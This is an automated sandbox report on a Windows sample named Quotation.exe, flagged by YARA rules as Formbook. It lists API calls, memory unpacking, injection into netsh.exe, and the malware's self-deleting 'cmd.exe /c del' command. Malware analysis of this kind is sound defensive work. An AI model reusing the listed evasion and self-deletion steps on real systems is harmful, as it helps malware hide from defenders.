          Source: 1.2.Quotation.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Quotation.exe.1eb40000.5.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Quotation.exe.1eb40000.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: Quotation.exe
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00419D60 NtCreateFile,
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00419E10 NtReadFile,
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00419E90 NtClose,
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00419F40 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00419DB3 NtReadFile,
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00419E8A NtClose,
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00419F3B NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C398F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C39840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C39860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C399A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C39910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C39A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C39A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C39A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C395D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C39540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C396E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C39660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C39780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C397A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C39710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C398A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C3B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C39820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C399D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C39950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C39A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C39A10 NtQuerySection,
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C3A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C39B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C395F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C39560 NtWriteFile,
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C39520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C3AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C396D0 NtCreateKey,
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C39650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C39670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C39610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C39FE0 NtCreateMutant,
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C39760 NtOpenProcess,
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C39770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C3A770 NtOpenThread,
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C3A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C39730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_1_00419D60 NtCreateFile,
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_1_00419E10 NtReadFile,
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_1_00419E90 NtClose,
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_1_00419F40 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034CA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034CA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034CA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C9650 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C9660 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034CAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034CB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034C98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_02BB9E90 NtClose,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_02BB9E10 NtReadFile,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_02BB9D60 NtCreateFile,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_02BB9E8A NtClose,
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_02BB9DB3 NtReadFile,
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_00403166 EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,GetCommandLineA,GetModuleHandleA,CharNextA,OleUninitialize,ExitProcess,lstrcatA,CreateDirectoryA,lstrcatA,lstrcatA,DeleteFileA,GetModuleFileNameA,lstrcmpiA,CopyFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_004046C3
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_004060D9
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_004068B0
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00401027
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00401030
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_0041E100
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_0041E246
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00402D90
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00409E40
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00409E3C
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_0041DF12
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_0041DF1C
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CC28EC
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C0B090
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C220A0
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CC20A8
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CB1002
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CCE824
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BFF900
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C14120
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CC22AE
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CBDBD2
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C2EBB0
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CC2B28
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CBD466
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C0841F
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CC25DD
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C0D5E0
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CC1D55
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00BF0D20
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CC2D07
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CC2EF7
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CBD616
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00C16E30
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00CC1FF1
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_1_00401027
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_1_00401030
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_1_0041E100
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_1_0041E246
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034BEBB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034A6E30
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03551D55
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0348F900
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03480D20
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_034A4120
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_03541002
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_0349B090
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_02BBE246
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_02BBE100
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_02BA9E3C
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_02BA9E40
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_02BA2FB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_02BBDF1C
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_02BBDF12
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 8_2_02BA2D90
          Source: C:\Users\user\Desktop\Quotation.exeCode function: String function: 00BFB150 appears 35 times
          Source: Quotation.exe, 00000000.00000003.236412291.000000001ECB6000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Quotation.exe
          Source: Quotation.exe, 00000000.00000002.242016768.00000000022D0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameAVICAP32.DLL.MUIj% vs Quotation.exe
          Source: Quotation.exe, 00000000.00000002.242012748.00000000022C0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemsvfw32.dll.muij% vs Quotation.exe
          Source: Quotation.exe, 00000001.00000002.278859602.000000000096C000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamenetsh.exej% vs Quotation.exe
          Source: Quotation.exe, 00000001.00000002.279247489.0000000000E7F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Quotation.exe
          Source: Quotation.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000001.00000001.237394511.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.237394511.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.278547391.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.278547391.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.496739110.0000000002BA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.496739110.0000000002BA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.497353357.0000000002E70000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.497353357.0000000002E70000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.497393185.0000000002EA0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.497393185.0000000002EA0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.242716511.000000001EB40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.242716511.000000001EB40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.278753698.00000000008D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.278753698.00000000008D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.278664638.0000000000760000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.278664638.0000000000760000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.Quotation.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.Quotation.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Quotation.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Quotation.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.Quotation.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.Quotation.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Quotation.exe.1eb40000.5.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Quotation.exe.1eb40000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Quotation.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Quotation.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Quotation.exe.1eb40000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Quotation.exe.1eb40000.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/3@4/4
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_00404201 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_004020A6 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7072:120:WilError_01
          Source: C:\Users\user\Desktop\Quotation.exeFile created: C:\Users\user\AppData\Local\Temp\nsz4E33.tmpJump to behavior
          Source: Quotation.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Quotation.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\Quotation.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Quotation.exeReversingLabs: Detection: 22%
          Source: C:\Users\user\Desktop\Quotation.exeFile read: C:\Users\user\Desktop\Quotation.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Quotation.exe 'C:\Users\user\Desktop\Quotation.exe'
          Source: C:\Users\user\Desktop\Quotation.exeProcess created: C:\Users\user\Desktop\Quotation.exe 'C:\Users\user\Desktop\Quotation.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe
          Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Quotation.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Quotation.exeProcess created: C:\Users\user\Desktop\Quotation.exe 'C:\Users\user\Desktop\Quotation.exe'
          Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Quotation.exe'
          Source: C:\Users\user\Desktop\Quotation.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: Binary string: netsh.pdb source: Quotation.exe, 00000001.00000002.278705852.0000000000799000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: Quotation.exe, 00000000.00000003.232762609.000000001ED00000.00000004.00000001.sdmp, Quotation.exe, 00000001.00000002.278883412.0000000000BD0000.00000040.00000001.sdmp, netsh.exe, 00000008.00000002.498460842.0000000003460000.00000040.00000001.sdmp
          Source: Binary string: netsh.pdbGCTL source: Quotation.exe, 00000001.00000002.278705852.0000000000799000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdb source: Quotation.exe, netsh.exe

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\Quotation.exeUnpacked PE file: 1.2.Quotation.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_0041E34F push eax; ret
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00417CCE push 7FCF5E29h; iretd
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00417CD7 push ebx; retf
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_004164B4 push esi; ret
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_00417D58 push esp; iretd
          Source: C:\Users\user\Desktop\Quotation.exeCode function: 1_2_0041CEB5 push eax; ret
